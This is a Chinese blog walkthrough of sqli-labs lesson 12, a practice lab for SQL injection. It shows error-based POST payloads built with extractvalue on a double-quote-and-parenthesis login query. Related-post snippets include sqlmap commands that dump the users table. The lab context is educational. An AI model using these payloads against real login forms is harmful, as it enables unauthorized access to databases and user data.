sqli-labs通关-------12lesson-post(基于错误的双引号变形)

最新推荐文章于 2024-07-22 19:36:47 发布
最新推荐文章于 2024-07-22 19:36:47 发布
阅读量315 收藏
点赞数
分类专栏: 安全 sql注入学习总结 文章标签: sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39584315/article/details/94749903
版权

首先我们查看万能密码变形(对第一个1进行各种引号括号变形)当发现使用双引号进行闭合时发现如下错

对于上面的报错 首先怀疑 where username = “usernmae” and password = “ps”

那本地数据库对语句进行演练。

 

好了那我们尝试构造一下上面的语句吧。

我们进行了如下构造

uname=1") and  extractvalue(1,concat(0x7e,(select database())))  #&passwd=&submit=Submit

结果如下:

 看别人的博客也可以这样构造:

admin"  and extractvalue(1,concat(0x7e,(select database())))  and " 

结果也是ok的。

还有就是万能密码也是可以的

枯藤闲画云
关注
专栏目录
sqli-labs通关记录
qq_39670065的博客
07-11 2793
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
Sqli-LABS通关笔录-1
aiquan9342的博客
11-25 108
在第一个关卡当中还是学到些知识。 1.注释语句多试试其他的几个 2.不报错可能是前面的语句没有错误,union没有得到执行。 http://127.0.0.1/sql/Less-1/index.php?id=1' 加单引号报错了。 从上面的错误提示当中,我们可以看到提交到sql中的1'在经过sql语句构造后形成 '1'' LIMIT 0,1,多加了一个...
Sqli-labs1~75关 通关详解
最新发布
2201_75891821的博客
07-22 488
sqli—labs通关攻略
Sqli-LABS通关笔录-10
aiquan9342的博客
12-01 96
好像咋整都没辙。实在是关卡越高越不好整。 弄报错。咋整咋不报错。 and sleep(10);鸭蛋的也不好搞。实在没辙。就看源码了。 由代码得出payload: THE END 转载于:https://www.cnblogs.com/xishaonian/p/6123441.html...
sqli-labs通关(less1~less10)
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
安装sqli-labs
10-22
安装完成sqli-labs靶场环境后,可以根据关卡信息练习,结合write up(通关指南)和手工测试工具使用sqli-labs靶场环境。 总结 安装sqli-labs靶场环境可以提供一个安全和合法的环境来学习和实践Web应用安全。通过...
sqli-labs通关-------04lesson-double_quotes
枯藤闲画云
05-31 301
到这个我们发现输入单引号和双引号好像都没啥反应http://127.0.0.1:90/sqli-labs/Less-4/?id=1’) ????????? 所以我们输入一个转义符进去,报错了。 为啥输入转移符 1.因为我碰到了输错了。。。。。 2.我发现好像换别的字符不行。。 3.so转移符可以进去把sql语句的字符串特殊字符转义,于是赶得巧了 ...
Sqli-labs通关总结
→_→
06-27 2003
历经两个多月,总于通关了,后面还有10关由于原作者并没有没有更新,我们也就无从下手,不过从这65关中我们足以对SQL注入有了一个清晰的了解了,也就勉强达到SQL注入入门的水平,接下来就是去各大平台去找SQL类型的题目去做。 在通关的过程中参考了别人写的博客,因为是初学者,参考了大量的博客,参考的过程中即能提升自己的技能,也能学习别人的思路,还能总结他们的做法,通关的方法有很多,我都一一做了记录,当然还要说一点的是,别人的博客多多少少都会有点错误,这需要我们自己去发现,记住,一定要自己...
sqli-labs通关详解
m0_52051132的博客
10-15 7027
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
详细sqli-labs(1-20)通关讲解
m0_57928318的博客
05-18 2209
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
Sqli_labs通关全解--总结
cyynid的博客
01-09 2194
Sqli_labs通关全解
SQLi Labs Lesson12
1ame的博客
08-14 308
Lesson-12 POST - Error Based - Double Quotes - String - with twist 首先进入欢迎界面。 随意填写表单,结果如图所示。 构造如下表单: 结果和上图一样,没有任何错误回显。结合本节的题目,是double quotes。 将表单中的单引号换为双引号,重新构造表单: 结果
sqli-labs第12
weixin_45626840的博客
04-23 339
思路一样 闭合类型为 “)
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值